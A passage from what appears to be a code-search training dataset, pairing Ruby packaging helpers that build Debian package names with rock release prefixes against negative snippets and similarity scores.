"def package_meta(name, depend,\n version: \"0.1\",\n force_update: false,\n distribution: nil,\n architecture: nil)\n\n debian_pkg_name = debian_meta_name(name)\n\n if force_update\n dirname = packaging_dir(debian_pkg_name)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n distribution ||= target_platform.distribution_release_name\n architecture ||= target_platform.architecture\n packaging_dir = packaging_dir(debian_pkg_name)\n\n if not File.directory?(packaging_dir)\n FileUtils.mkdir_p packaging_dir\n end\n\n package_deb_meta(name, depend,\n version: version,\n distribution: distribution,\n packaging_dir: packaging_dir)\n end",
"def release_name\n FFI::GDAL.GDALVersionInfo('RELEASE_NAME')\n end",
"def default_platform_service_name(version: installed_postgresql_major_version, source: installed_postgresql_package_source)\n if platform_family?('rhel', 'fedora', 'amazon') && source.eql?(:repo)\n \"postgresql-#{version}\"\n else\n 'postgresql'\n end\n end",
"def product_name\n name? ? name : [product.name, sub_name].reject{ |a| a.strip.length == 0 }.join(' - ')\n end",
"def ver(v, typ)\n v.gsub!(/ (?:^.+ \\sAS\\s (.+$))? | \\s+() | ^v() /nix, \"\\\\1\")\n case typ\n when :deb\n v.gsub!(/[-@](dev|patch).*$/, \"~~\")\n v.gsub!(/[-@](alpha|beta|RC|stable).*$/, \"~\")\n when :rpm\n v.gsub!(/[-@](dev|patch|alpha|beta|RC|stable).*$/, \"\")\n else\n v.gsub!(/@/, \"-\")\n end\n return v\n end",
"def create_arch_package(arch, arch_dir, src_dir, out_dir, pack_config)\n # Load manifest\n manifest = YAML.load_file(\"#{src_dir}/manifest.yaml\")\n manifest['arch'] = arch\n name = manifest['name']\n version = manifest['version']\n info \"Packing #{src_dir} (#{arch})\"\n\n npk = \"#{out_dir}/#{name}-#{arch}-#{version}.npk\"\n\n # TODO: do this seperatly\n # Remove existing containers\n Dir.glob(\"#{out_dir}/#{name}-#{arch}-*\").each { |c| FileUtils.rm(c, :verbose => false) }\n\n create_npk(src_dir, npk, manifest, arch_dir, pack_config)\n\n # Update/Create version list\n version_info_path = File.join(out_dir, \"packages-#{arch}.yaml\")\n update_version_list(version_info_path, name, version)\nend",
"def product_name\n name? ? name : [product.name, sub_name].reject{ |a| a.strip.length == 0 }.join(' - ')\n end"
] | [
"0.79385996",
"0.7263144",
"0.71180815",
"0.70813316",
"0.7042691",
"0.7033252",
"0.6661746",
"0.6645817",
"0.66052526",
"0.6584799",
"0.65558136",
"0.64697367",
"0.6411772",
"0.6375237",
"0.6351443",
"0.6343119",
"0.63246405",
"0.6296833",
"0.6254793",
"0.62546974",
"0.6228731",
"0.6209953",
"0.6140385",
"0.611127",
"0.60539925",
"0.6050726",
"0.60455334",
"0.60399544",
"0.60262525",
"0.60261923",
"0.60243404",
"0.5996383",
"0.5996383",
"0.5906256",
"0.5892529",
"0.58892155",
"0.58888936",
"0.588427",
"0.58613104",
"0.5852702",
"0.5819525",
"0.58163416",
"0.5806628",
"0.57822543",
"0.57652646",
"0.5754148",
"0.57496154",
"0.57473546",
"0.5744428",
"0.5729098",
"0.5723797",
"0.5715465",
"0.57128274",
"0.56958216",
"0.5669866",
"0.56571317",
"0.5638531",
"0.5632577",
"0.56121457",
"0.55837995",
"0.5578796",
"0.55608606",
"0.55521566",
"0.55370474",
"0.5530519",
"0.55050784",
"0.5497422",
"0.5497422",
"0.5489798",
"0.5474623",
"0.54739153",
"0.5460413",
"0.54408765",
"0.54328406",
"0.5432169",
"0.5430534",
"0.54231334",
"0.54089403",
"0.5403523",
"0.5397685",
"0.53768873",
"0.5333744",
"0.5333744",
"0.52853805",
"0.52822846",
"0.52796346",
"0.5279322",
"0.5270197",
"0.52626115",
"0.52605176",
"0.5255885",
"0.52556145",
"0.5252988",
"0.5242106",
"0.52376217",
"0.52359444",
"0.5231281",
"0.5229881",
"0.5224871",
"0.5214588"
] | 0.8442843 | 0 |
The debian name of a meta package rock[]meta and the releasename can be avoided by setting with_rock_release_prefix to false | def debian_meta_name(name, with_rock_release_prefix = true)
if with_rock_release_prefix
rock_release_prefix + "meta-" + Deb.canonize(name)
else
pkg_prefix_base + "meta-" + Deb.canonize(name)
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def debian_name(pkg)\n if pkg.kind_of?(Autoproj::RubyPackage)\n debian_ruby_name(pkg.name)\n else\n \"rock-\" + canonize(pkg.name)\n end\n end",
"def rock_release_prefix(release_name = nil)\n release_name ||= rock_release_name\n if release_name\n pkg_prefix_base + \"-#{release_name}-\"\n else\n pkg_prefix_base + \"-\"\n end\n end",
"def debian_name(pkginfo, with_rock_release_prefix = true, release_name = nil)\n if pkginfo.kind_of?(String)\n raise ArgumentError, \"method debian_name expects a PackageInfo as argument, got: #{pkginfo.class} '#{pkginfo}'\"\n end\n name = pkginfo.name\n\n debianize_name(name,\n build_type: pkginfo.build_type,\n with_rock_release_prefix: with_rock_release_prefix,\n release_name: release_name)\n end",
"def debianize_name(name, build_type: :cmake, with_rock_release_prefix: true, release_name: rock_release_name)\n if build_type == :ruby\n if with_rock_release_prefix\n rock_release_prefix(release_name) + \"ruby-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"-ruby-\" + Deb.canonize(name)\n end\n else\n if with_rock_release_prefix\n rock_release_prefix(release_name) + Deb.canonize(name)\n else\n pkg_prefix_base + \"-\" + Deb.canonize(name)\n end\n end\n end",
"def debian_ruby_name(name, with_rock_release_prefix = true, release_name = nil)\n if with_rock_release_prefix\n rock_ruby_release_prefix(release_name) + Deb.canonize(name)\n else\n \"ruby-\" + Deb.canonize(name)\n end\n end",
"def package_name\n @version ? \"#{@name}-#{@version}\" : @name\n end",
"def package_name\n @package_name ||=\n Pathname(\"#{cartage.final_name}.tar#{cartage.tar_compression_extension}\")\n end",
"def package_name\n # TODO: verify renamed packages\n resource['title']\n end",
"def rock_ruby_release_prefix(release_name = nil)\n rock_release_prefix(release_name) + \"ruby-\"\n end",
"def built_rpm_names(build)\n build.\n # Just names from the rpms without nvr info\n brew_rpms.map(&:name_nonvr).\n # Remove any duplicates\n uniq.\n # Filter out any debuginfo names\n reject{ |name| name =~ /debuginfo/ }.\n # Remove prefixes if there are any for this product. (Mainly for SCL, see Bug 1003719)\n map { |name| BrewRpmNamePrefix.strip_using_list_of_prefixes(@errata.product.brew_rpm_name_prefixes, name) }\n end",
"def native_dependency_name(name, selected_platform = nil)\n if !selected_platform\n selected_platform = @packager.target_platform\n end\n\n # Identify this rock release and its ancestors\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, selected_platform.architecture)\n\n if name.is_a? String\n # Check for 'plain' name, the 'unprefixed' name and for the 'release' name\n if this_rock_release.ancestorContains(name) ||\n selected_platform.contains(name)\n # direct name match always is an os dependency\n # it can never be in a rock release\n return [name, true]\n end\n\n # try debian naming scheme for ruby\n if this_rock_release.ancestorContains(\"ruby-#{Deb.canonize(name)}\") ||\n selected_platform.contains(\"ruby-#{Deb.canonize(name)}\")\n return [\"ruby-#{Deb.canonize(name)}\", true]\n end\n\n # otherwise, ask for the ancestor that contains a rock ruby\n # package\n ancestor_release_name = this_rock_release.releasedInAncestor(\n @packager.debian_ruby_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release_name.empty?\n return [@packager.debian_ruby_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_ruby_name(name, true), false]\n else\n # ask for the ancestor that contains a rock ruby\n # package\n ancestor_release = this_rock_release.releasedInAncestor(\n @packager.debian_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release.empty?\n return [@packager.debian_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_name(name, true), false]\n end\n end",
"def package_name(project)\n \"#{project.name}-#{project.version}-#{project.release}.#{@architecture}.pkg.gz\"\n end",
"def package_name(buildno=nil)\n if buildno\n buildno = Time.now.strftime(\"%H*60+%M\")\n versnum = \"#{version}.#{buildno}\"\n else\n versnum = version\n end\n\n if platform\n \"#{name}-#{versnum}-#{platform}\"\n else\n \"#{name}-#{versnum}\"\n end\n end",
"def release_name\n return nil unless @data['name'] && @data['version']\n [ dashed_name, @data['version'] ].join('-')\n end",
"def package_filename\n \"#{@package.name}_#{@package.version}_#{@package.architecture}.deb\"\n end",
"def package_name\n name = package_drop_last(slug_parts)\n name.empty? ? '_root_' : name\n end",
"def package_name\n ver = if new_resource.version == 'latest'\n package_metadata[:version]\n else\n new_resource.version\n end\n \"Chef Development Kit v#{ver}\"\n end",
"def detailed_name\n \"#{label} ( #{name}_V#{version} )\"\n end",
"def original_name # :nodoc:\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{@name}-#{@version}\"\n else\n \"#{@name}-#{@version}-#{@original_platform}\"\n end\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil? then\n \"#{name}-#{version}\".untaint\n else\n \"#{name}-#{version}-#{platform}\".untaint\n end\n end",
"def filtered_dependencies(pkginfo, with_rock_release_prefix = true)\n target_platform = @packager.target_platform\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, target_platform.architecture)\n\n deps_rock_pkginfos = pkginfo.dependencies[:rock_pkginfo].dup\n deps_osdeps_packages = pkginfo.dependencies[:osdeps].dup\n non_native_dependencies = pkginfo.dependencies[:nonnative].dup\n\n if target_platform.distribution_release_name\n # CASTXML vs. GCCXML in typelib\n if pkginfo.name =~ /typelib$/\n # add/remove the optional dependencies on the\n # rock-package depending on the target platform\n # there are typelib versions with and without the\n # optional depends. we know which platform requires\n # a particular dependency.\n deps_rock_pkginfos.delete_if do |pkginfo|\n pkginfo.name == \"castxml\" || pkginfo.name == \"gccxml\"\n end\n\n if target_platform.contains(\"castxml\")\n deps_osdeps_packages.push(\"castxml\")\n elsif target_platform.contains(\"gccxml\")\n #todo: these need to checked on the other platforms\n deps_osdeps_packages.push(\"gccxml\")\n else\n raise ArgumentError, \"TargetPlatform: #{target_platform} does neither support castxml nor gccml - cannot build typelib\"\n end\n end\n\n # Filter out optional packages, e.g. llvm and clang for all platforms where not explicitly available\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n result = true\n Packaging::Config.packages_optional.each do |pkg_name|\n regex = Regexp.new(pkg_name)\n if regex.match(name)\n result = target_platform.contains(name)\n end\n end\n result\n end\n\n # Filter out excluded packages, e.g. libqwt5-qt4-dev\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n result = true\n Packaging::Config.packages_excluded.each do |pkg_name|\n regex = Regexp.new(pkg_name)\n if regex.match(name)\n Packager.info \"#{pkginfo.name} excluding osdeps #{pkg_name} as dependency\"\n result = false\n end\n end\n result\n end\n\n # Filter ruby versions out -- we assume chroot has installed all\n # ruby versions\n #\n # This is a workaround, since the information about required packages\n # comes from the build server platform and might not correspond\n # with the target platform\n #\n # Right approach: bootstrap within chroot and generate source packages\n # in the chroot\n #deps_osdeps_packages = deps[:osdeps].select do |name|\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n name !~ /^ruby[0-9][0-9.]*/\n end\n\n # Prefer package of the OS for gems if they are available there\n #deps_nonnative_packages = deps[:nonnative].map do |name, version|\n non_native_dependencies = non_native_dependencies.map do |name, version|\n dep_name,is_osdep = native_dependency_name(name)\n # if with_rock_release_prefix is given all packages 'have to be'\n # os dependencies, otherwise it triggers further resolution of nonnative packages\n # which cannot exist (in resolve_all)\n if is_osdep || with_rock_release_prefix\n deps_osdeps_packages << dep_name\n nil\n else\n name\n end\n end.compact\n end\n\n deps_rock_packages = deps_rock_pkginfos.map do |pkginfo|\n debian_name = @packager.debian_name(pkginfo, with_rock_release_prefix)\n this_rock_release.packageReleaseName(debian_name)\n end.sort\n\n Packager.info \"'#{pkginfo.name}' with (available) rock package dependencies: '#{deps_rock_packages}'\"\n Packager.info \"'#{pkginfo.name}' with (available) osdeps dependencies: '#{deps_osdeps_packages}'\"\n\n # Return rock packages, osdeps and non native deps (here gems)\n {:rock => deps_rock_packages, :osdeps => deps_osdeps_packages, :nonnative => non_native_dependencies }\n end",
"def full_name\n \"#{@name}-#{@version}\"\n end",
"def package_name\n [self.config.organization, self.config.project_name].compact.collect(&:underscore).join('-')\n end",
"def full_name\n \"#{@package}.#{parameterized_name}\"\n end",
"def release_manifest_name\n \"#{name}-release-manifest\"\n end",
"def fmri_package_name\n version = project.build_version.split(/[^\\d]/)[0..2].join(\".\")\n platform = Ohai[\"platform_version\"]\n \"#{safe_base_package_name}@#{version},#{platform}-#{project.build_iteration}\"\n end",
"def package_name\n raise NotImplementedError\n end",
"def default_container_name\n full_release_name.gsub('_', '-')\n end",
"def vendored_package_name(package)\n\tFile.join($package_name, 'vendor/src', package)\nend",
"def package_name\n raise Puppet::Error, 'luet requires packages have a category set' unless @resource[:category]\n\n \"#{@resource[:category]}/#{@resource[:name]}\"\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{name}-#{version}\".dup.tap(&Gem::UNTAINT)\n else\n \"#{name}-#{version}-#{platform}\".dup.tap(&Gem::UNTAINT)\n end\n end",
"def prefixed_label(package)\n label = ( package =~ /^#{$prefix}(.*)$/ ) && $1 || package\n label = '.' if label.empty?\n label\nend",
"def full_name\n \"#{spec.name}-#{spec.version}\"\n end",
"def hadoop_package(name)\n return name unless hdp22?\n return name if node['platform_family'] == 'debian'\n fw = name.split('-').first\n pv = hdp_version.tr('.', '_').tr('-', '_')\n nn = \"#{fw}_#{pv}\"\n name.gsub(fw, nn)\n end",
"def rpm_package_information\n super\n end",
"def get_pkg_name(candidate_tag=nil, distro=nil)\n prod_name = self.task.prod\n\n # FIXME: stop that hardcoding... one day!\n pkg_name = self.name\n\n distro = self.task.distros[0] if distro.nil?\n\n is_scl_package = MeadSchedulerService.is_scl_package?(prod_name, self.name)\n # different naming convention for different products\n if prod_name == \"eap6\" && distro == 'el7' && is_scl_package\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n\n # Only enable scl thing for RHEL distros, aka when distro = el_\n elsif is_scl_package && distro.match(/^el/)\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n end\n pkg_name\n end",
"def set_dpkg_package_name(name)\n dpkg_package.name name\n dpkg_package.package_name name\n end",
"def package_meta(name, depend,\n version: \"0.1\",\n force_update: false,\n distribution: nil,\n architecture: nil)\n\n debian_pkg_name = debian_meta_name(name)\n\n if force_update\n dirname = packaging_dir(debian_pkg_name)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n distribution ||= target_platform.distribution_release_name\n architecture ||= target_platform.architecture\n packaging_dir = packaging_dir(debian_pkg_name)\n\n if not File.directory?(packaging_dir)\n FileUtils.mkdir_p packaging_dir\n end\n\n package_deb_meta(name, depend,\n version: version,\n distribution: distribution,\n packaging_dir: packaging_dir)\n end",
"def rpm_no_arch\n @rpm_no_arch\n end",
"def to_s\n \"#{@distro.capitalize} #{@product.gsub(/_/, ' ').capitalize} #{@version}\"\n end",
"def spec_name\n \"#{full_name}.gemspec\"\n end",
"def platform_shortname\n if rhel?\n if \"rocky\" == Ohai[\"platform\"]\n \"rocky\"\n else\n \"el\"\n end\n elsif suse?\n \"sles\"\n else\n Ohai[\"platform\"]\n end\n end",
"def package_name\n if supports_ports?\n if makefile_variable_value(\"PKGNAME\", port_path) =~ /^(.+)-[^-]+$/\n $1\n else\n raise Chef::Exceptions::Package, \"Unexpected form for PKGNAME variable in #{port_path}/Makefile\"\n end\n else\n new_resource.package_name\n end\n end",
"def StripReleaseNo(pkg_name)\n build_no_pos = Builtins.findlastof(pkg_name, \"-\") # find trailing build no.\n\n if build_no_pos != nil && Ops.greater_than(build_no_pos, 0)\n # cut off trailing build no.\n pkg_name = Builtins.substring(pkg_name, 0, build_no_pos)\n end\n\n pkg_name\n end",
"def native_release_packages\n @attributes[:native_release_packages]\n end",
"def native_pkg_to_install_string(pkg)\n name = pkg[:metadata][:name]\n version = pkg[:metadata][:version]\n package_version = pkg[:metadata][:package_version]\n pkgname = \"#{name}-#{version}\"\n if package_version\n pkgname << \"-#{package_version}\"\n end\n pkgname\n end",
"def rpm_family_and_version\n if Pkg::Config.vanagon_project\n Pkg::Config.rpm_targets.split(' ').map do |target|\n rpm_el_family, rpm_el_version, = target.split('-')\n \"#{rpm_el_family}-#{rpm_el_version}\"\n end\n else\n Pkg::Config.final_mocks.split.map { |mock| \"#{mock_el_family(mock)}-#{mock_el_ver(mock)}\" }\n end\nend",
"def dcv_package\n \"nice-dcv-#{node['cluster']['dcv']['version']}-#{node['cluster']['base_os']}-#{dcv_url_arch}\"\nend",
"def key\n \"gem-package-#{name}\"\n end",
"def title\n \"#{artist.name} - #{name} [#{release.catalog_number}]\"\n end",
"def fix_name(name)\n if name.start_with?(\"python\")\n # If the python package is called \"python-foo\" strip the \"python-\" part while\n # prepending the package name prefix.\n return [attributes[:python_package_name_prefix], name.gsub(/^python-/, \"\")].join(\"-\")\n else\n return [attributes[:python_package_name_prefix], name].join(\"-\")\n end\n end",
"def package_basename(extension='.gem')\n [ package_name, version ].join('-') + extension\n end",
"def source_name\n 'Archives & Manuscripts'\n end",
"def repository_name\n @repository_name ||= \"#{project_name}-boshrelease\"\n end",
"def bot_short_name_without_version(pr)\n bot_short_name(pr).sub(/_v\\d*$/, '_v')\n end",
"def pcb_display_name\n name = self.pcb_name\n name += ' ' + self.pcb_revision if self.pcb_revision.size > 0\n name\n end",
"def version_file_from( name )\n\t\treturn name.\n\t\t\tsplit( /-/ ).\n\t\t\treject {|word| PACKAGE_IGNORE_WORDS.include?(word) }.\n\t\t\tjoin( '/' )\n\tend",
"def release(options)\n options = options.rekey\n\n unixname = self.unixname\n\n package = options[:package] || metadata.name\n version = options[:version] || metadata.version\n\n date = options[:date] || metadata.released || Time::now.strftime('%Y-%m-%d %H:%M')\n\n changes = options[:changes] || project.history.releases[0].changes\n notes = options[:notes] || project.history.releases[0].note\n\n release = options[:release] || version\n\n files = options[:files] || options[:file] || []\n\n #store = options[:store] || 'pkg'\n\n processor = options[:processor] || 'Any'\n\n is_public = !options[:private]\n\n #raise ArgumentError, \"missing unixname\" unless unixname\n raise ArgumentError, \"missing package\" unless package\n raise ArgumentError, \"missing release\" unless release\n\n # package name has to be 3+ characters.\n if package.size < 3\n package = package + \"'s\"\n end\n\n # sub in for version if %s is used in release name.\n release = release % version if release.index(\"%s\")\n\n release_notes = notes\n release_changes = changes\n\n # Gather package files to release.\n if files.empty?\n files = find_packages(version)\n else\n files = files.map do |file|\n if File.directory?(file)\n find_packages(version, file)\n else\n file\n end\n end\n files = files.flatten\n end\n files = files.select{ |f| File.file?(f) }\n\n abort \"No package files.\" if files.empty?\n\n files.each do |file|\n abort \"Not a file -- #{file}\" unless File.exist?(file)\n puts \"Release file: #{File.basename(file)}\"\n end\n\n # which package types\n #rtypes = [ 'tgz', 'tbz', 'tar.gz', 'tar.bz2', 'deb', 'gem', 'ebuild', 'zip' ]\n #rtypes -= exclude\n #rtypes = rtypes.collect{ |rt| Regexp.escape( rt ) }\n #re_rtypes = Regexp.new('[.](' << rtypes.join('|') << ')$')\n\n puts \"Releasing #{package} #{release} to #{unixname} project...\" #unless options['quiet']\n\n login do\n\n raise ArgumentError, \"missing group_id\" unless group_id\n\n unless package_id = package?(package)\n if trial?\n puts \"Package '#{package}' does not exist.\"\n puts \"Create package #{package}.\"\n abort \"Cannot continue in trial mode.\"\n else\n #unless options['force']\n q = \"Package '#{package}' does not exist. Create?\"\n a = ask(q, 'yN')\n abort \"Task canceled.\" unless ['y', 'yes', 'okay'].include?(a.downcase)\n #end\n puts \"Creating package #{package}...\"\n create_package(package, is_public)\n unless package_id = package?(package)\n raise \"Package creation failed.\"\n end\n end\n end\n if release_id = release?(release, package_id)\n #unless options[:force]\n if trial?\n puts \"Release #{release} already exists.\"\n else\n q = \"Release #{release} already exists. Re-release?\"\n a = ask(q, 'yN')\n abort \"Task canceled.\" unless ['y', 'yes', 'okay'].include?(a.downcase)\n #puts \"Use -f option to force re-release.\"\n #return\n end\n files.each do |file|\n fname = File.basename(file)\n if file_id = file?(fname, package)\n if trial?\n puts \"Remove file #{fname}.\"\n else\n puts \"Removing file #{fname}...\"\n remove_file(file_id, release_id, package_id)\n end\n end\n if trial?\n puts \"Add file #{fname}.\"\n else\n puts \"Adding file #{fname}...\"\n add_file(file, release_id, package_id, processor)\n end\n end\n else\n if trial?\n puts \"Add release #{release}.\"\n else\n puts \"Adding release #{release}...\"\n add_release(release, package_id, files,\n :processor => processor,\n :release_date => date,\n :release_changes => release_changes,\n :release_notes => release_notes,\n :preformatted => '1'\n )\n unless release_id = release?(release, package_id)\n raise \"Release creation failed.\"\n end\n end\n #files.each do |file|\n # puts \"Added file #{File.basename(file)}.\"\n #end\n end\n end\n puts \"Release complete!\" unless trial?\n end",
"def package_name(val = NULL_ARG)\n @package_name = val unless val.equal?(NULL_ARG)\n @package_name.nil? ? @name : @package_name\n end",
"def server_pkg_name\n platform_family?('debian') ? \"postgresql-#{new_resource.version}\" : \"postgresql#{new_resource.version.delete('.')}-server\"\n end",
"def manifest_name(name, pack_type)\n name.chomp(\".#{pack_type}\")\n end",
"def meta_description\n # Change the value below between the quotes.\n \"File Repository for EZ Troubleshooter\"\n end",
"def name\n return \"LA100QAQC\"\n end",
"def getNameForPrecompiled\n sanitizeForPath(\"#{@Name}_#{@Version}_\" +\n (@BranchEpoch ? \"sv_#{@BranchEpoch}_\" : '') +\n \"opts_#{optionsHash}\")\n end",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def hadoop_package(name)\n return name unless hdp22? || iop?\n return name if node['platform_family'] == 'debian'\n fw =\n if name == 'spark-core'\n name\n else\n name.split('-').first\n end\n pv =\n if hdp22?\n hdp_version.tr('.', '_').tr('-', '_')\n else\n node['hadoop']['distribution_version'].tr('.', '_')\n end\n nn = \"#{fw}_#{pv}\"\n name.gsub(fw, nn)\n end",
"def product_name; end",
"def safe_base_package_name\n if project.package_name =~ /\\A[a-z0-9\\.\\+\\-]+\\z/\n project.package_name.dup\n else\n converted = project.package_name.downcase.gsub(/[^a-z0-9\\.\\+\\-]+/, \"-\")\n\n log.warn(log_key) do\n \"The `name' component of IPS package names can only include \" \\\n \"lowercase alphabetical characters (a-z), numbers (0-9), dots (.), \" \\\n \"plus signs (+), and dashes (-). Converting `#{project.package_name}' to \" \\\n \"`#{converted}'.\"\n end\n converted\n end\n end",
"def apt_packages\n PRE_INSTALLED_OS_PACKAGES[@app.release].join(\" #{NL_TAB}\")\n end",
"def name\n return item_info.name + quality_txt\n end",
"def fully_qualified_name\n return \".#{self.package}\"\n end",
"def package_set_name(path, branch='master')\n file = dir_git(path,branch,/source\\.yml/)\n raw = raw_file_from_git(path,file[0])\n yaml = YAML.load(raw)\n yaml[\"name\"]\n end",
"def file_name\n \"#{full_name}.gem\"\n end",
"def name\n return 'Generic QAQC'\n end",
"def generate_debian_dir_meta(name, depends, base_dir: Dir.pwd, version: \"0.1\", distribution: nil)\n existing_debian_dir = File.join(\"#{name}-#{version}\",\"debian-meta\")\n template_dir =\n if File.directory?(existing_debian_dir)\n existing_debian_dir\n else\n TEMPLATES_META\n end\n\n dir = File.join(base_dir, \"debian\")\n FileUtils.mkdir_p dir\n debian_name = debian_meta_name(name)\n debian_version = \"#{version}\"\n if distribution\n debian_version += '~' + distribution\n end\n\n deps_rock_packages = depends\n deps_osdeps_packages = []\n deps_nonnative_packages = []\n\n Packager.info \"Required OS Deps: #{deps_osdeps_packages}\"\n Packager.info \"Required Nonnative Deps: #{deps_nonnative_packages}\"\n\n Find.find(template_dir) do |path|\n next if File.directory?(path)\n template = ERB.new(File.read(path), nil, \"%<>\", path.gsub(/[^w]/, '_'))\n begin\n rendered = template.result(binding)\n rescue\n puts \"Error in #{path}:\"\n raise\n end\n\n target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)\n FileUtils.mkdir_p File.dirname(target_path)\n File.open(target_path, \"w\") do |io|\n io.write(rendered)\n end\n end\n\n return dir\n end",
"def package_name(val = NULL)\n if null?(val)\n @package_name || name\n else\n @package_name = val\n end\n end",
"def dmg_package_app\n case new_resource.source\n when :direct\n ::File.basename(package_metadata[:url], '.dmg')\n else\n ::File.basename(new_resource.source.to_s, '.dmg')\n end\n end",
"def image_name_with_specified_version(version)\n @registry.nil? ? \"#{@name}:#{version}\" : \"#{@registry}/#{@name}:#{version}\"\n end",
"def product_name\n return product_presentation.name if product_presentation\n return \"\"\n end",
"def to_name\n \"#{MAJOR}_#{MINOR}_#{REVISION}\"\n end",
"def to_name\n \"#{MAJOR}_#{MINOR}_#{REVISION}\"\n end",
"def live_name\n [\n transformed_part('product'),\n middle_name(standalone: false), # Will have word dividers on either side\n idx,\n maybe_upto,\n '-',\n parts['sku'] =~ /editorial/ && bang? ? 'square-' : nil,\n [name_base, ext_name].join\n ].compact.join\n end",
"def type_and_version\n self.name.gsub(\"#{Licensed::Sources.name}::\", \"\")\n .gsub(/([A-Z\\d]+)([A-Z][a-z])/, \"\\\\1_\\\\2\".freeze)\n .gsub(/([a-z\\d])([A-Z])/, \"\\\\1_\\\\2\".freeze)\n .downcase\n .split(\"::\")\n end",
"def title\n repo = (repository && repository.identifier.present?) ? \" (#{repository.identifier})\" : ''\n comm = short_comments.blank? ? '' : (': ' + short_comments)\n \"#{l(:label_revision)} #{format_identifier}#{repo}#{comm}\"\n end",
"def mpc_name\n File.join(self.recipe_file.path, @mpc_id + '.mpc')\n end",
"def name_pri\n puts \"\\nPrint Names:\"\n @apks.each do |apk|\n puts apk.fname\n end\n end",
"def modulename\n \"vds\"\n end",
"def key_for_package(pkg)\n if !pkg.id.nil?\n \"#{pkg.id}-#{@name}\"\n else\n return \"#{pkg.categories.split.first}/#{pkg.name}-#{@name}\"\n end\n end",
"def old_filename() \n\t\t \t\treturn @podspec + \"_old\"\n\t\t \tend",
"def package_repository(package_name, desired_version, arch = nil)\n package(package_name, arch, true, false) do |pkg|\n return pkg.repoid if desired_version == pkg.version.to_s\n end\n\n nil\n end",
"def installer_filename\n if PRE_RELEASE\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar\"\n else\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar.gz\"\n end\nend",
"def get_linux_distro_version_codename\n version_codename_regex = /^VERSION_CODENAME=\\W*(\\w+)\\W*/\n File.open('/etc/os-release') do |release_file|\n release_file.each do |line|\n return line.match(version_codename_regex)[1].downcase if line =~ version_codename_regex\n end\n end\n ''\n end",
"def jurisdiction_name oc_code\n oc_code = \"oc_#{oc_code}\" unless oc_code.to_s.match?(/^oc_/)\n Card.fetch_name oc_code.to_sym\nend",
"def getsfLma__PackageObjName\r\n\t\t\treturn \"sfLma__Package__c\"\r\n\t\tend",
"def drop_prefix(repo)\n repo.split('-')[1].to_s.capitalize\nend",
"def fedora_name\n 'image_file'\n end",
"def pcba_display_name\n name = self.pcba_name\n name += ' ' + self.pcba_revision if self.pcba_revision.size > 0\n name\n end"
] | [
"0.7454804",
"0.7094609",
"0.7083253",
"0.69993",
"0.6651239",
"0.6450723",
"0.6414287",
"0.6396047",
"0.6259771",
"0.62469524",
"0.6229925",
"0.62116957",
"0.6173754",
"0.601299",
"0.6005974",
"0.5993302",
"0.5990938",
"0.58022726",
"0.5784182",
"0.578295",
"0.57796746",
"0.5779416",
"0.5745149",
"0.57385975",
"0.5692017",
"0.56839764",
"0.5676268",
"0.5675612",
"0.56447953",
"0.561208",
"0.56034046",
"0.55801654",
"0.55325323",
"0.5531143",
"0.55161136",
"0.5485817",
"0.5473485",
"0.5413597",
"0.54121625",
"0.54091007",
"0.5404415",
"0.5384629",
"0.53568256",
"0.53547806",
"0.53389174",
"0.53275526",
"0.53269583",
"0.53227115",
"0.53208566",
"0.5316243",
"0.52691364",
"0.526721",
"0.5264272",
"0.52616274",
"0.5247142",
"0.52358174",
"0.52336913",
"0.5228894",
"0.52222854",
"0.52143526",
"0.5212653",
"0.5209908",
"0.5195862",
"0.51715976",
"0.5170757",
"0.5170757",
"0.5170757",
"0.5170757",
"0.5169243",
"0.51630884",
"0.51475334",
"0.51419705",
"0.5137144",
"0.513671",
"0.5133106",
"0.513299",
"0.5132559",
"0.512904",
"0.51283157",
"0.51192605",
"0.5106043",
"0.50915736",
"0.5089853",
"0.5089853",
"0.5087427",
"0.50824076",
"0.5058975",
"0.5051537",
"0.50506765",
"0.5048437",
"0.5041652",
"0.50348663",
"0.50338835",
"0.5033409",
"0.50324863",
"0.5031251",
"0.503058",
"0.5028353",
"0.50242126",
"0.5024012"
] | 0.8754608 | 0 |
The debian name of a package [rock]ruby and the releasename prefix can be avoided by setting with_rock_release_prefix to false | def debian_ruby_name(name, with_rock_release_prefix = true, release_name = nil)
if with_rock_release_prefix
rock_ruby_release_prefix(release_name) + Deb.canonize(name)
else
"ruby-" + Deb.canonize(name)
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def debian_name(pkg)\n if pkg.kind_of?(Autoproj::RubyPackage)\n debian_ruby_name(pkg.name)\n else\n \"rock-\" + canonize(pkg.name)\n end\n end",
